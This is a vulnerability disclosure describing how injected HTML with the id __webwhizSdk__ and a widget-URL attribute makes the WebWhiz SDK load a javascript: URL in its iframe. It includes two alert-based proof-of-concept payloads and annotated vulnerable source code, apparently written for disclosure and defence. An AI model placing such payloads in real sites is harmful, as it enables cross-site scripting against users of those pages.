WebWhiz allows you to create an AI chatbot that knows everything about your product and can instantly respond to your customer’s queries.
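The WebWhiz library loads its widget in an <iframe> whose src can be controlled through the data-widget-url attribute of the element with the id __webwhizSdk__.
The SDK finds that element by id alone and does not check the scheme of the value, so injected markup that is allowed to carry an id and a data-* attribute is enough to make the iframe load a javascript: URL, which runs in the embedding page's origin.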
<!-- user input -->
<x id="__webwhizSdk__" data-widget-url="javascript:alert()//"></x>
<!-- after version 1.0.0, WebWhiz must be installed using npm install -->
Root Cause
Source: https://github.com/webwhiz-ai/webwhiz/blob/2.0.0-beta.5/widget/webwhiz-sdk.js#L267
// Resolves the base URL that is later used as the start of the widget iframe's src.
// NOTE(review): nothing in this function restricts the scheme or host of the value it returns;
// a fix would parse it with new URL() and accept only http(s) before returning it.
function __WEBWHIZ__getWidgetURL() {
// Lookup is by id only, so the first element in the document carrying this id is used,
// whether or not it is the SDK's own <script> tag.
const scriptEl = document.getElementById("__webwhizSdk__");
// Either attribute is accepted and its value is taken as-is.
const baseURL = scriptEl.getAttribute('widgetUrl') || scriptEl.getAttribute('data-widget-url');
// The hosted widget is the fallback only when neither attribute yields a non-empty value.
return baseURL || 'https://widget.webwhiz.ai/';
}
Source: https://github.com/webwhiz-ai/webwhiz/blob/2.0.0-beta.5/widget/webwhiz-sdk.js#L152
// Base URL comes straight from the attribute-reading getter __WEBWHIZ__getWidgetURL().
var __WEBWHIZ__URL = __WEBWHIZ__getWidgetURL();
// [...]
// Sink: the unvalidated base URL becomes the start of the iframe src. Appending the query
// string does not neutralise a javascript: scheme (the PoC's trailing // comments it out).
ifrm.setAttribute("src", __WEBWHIZ__URL + '?kbId=' + kbId +'&baseUrl=' + baseUrl);
Found by @kevin_mizu.
The WebWhiz library previously allowed its widget <iframe> to be loaded with an attacker-controlled src through the widgetUrl attribute of the element with the id __webwhizSdk__.
<!-- user input -->
<x id="__webwhizSdk__" widgetUrl="javascript:alert(document.domain)//"></x>
<script src="https://www.unpkg.com/[email protected]/dist/sdk.js"></script>
Root Cause
// Minified SDK build, same pattern: the widgetUrl attribute of whichever element has the id
// __webwhizSdk__ is read and returned without any scheme check; the hosted widget URL is
// used only when the attribute is missing or empty.
var e=function(){let e=document.getElementById("__webwhizSdk__").getAttribute("widgetUrl");return e||"https://widget.webwhiz.ai/"}();
// [...]
i=document.createElement("iframe");
// [...]
// Sink: e reaches the iframe src unchanged apart from the appended query string.
i.setAttribute("src",e+"?kbId="+a+"&baseUrl="+s)})
Found by @kevin_mizu.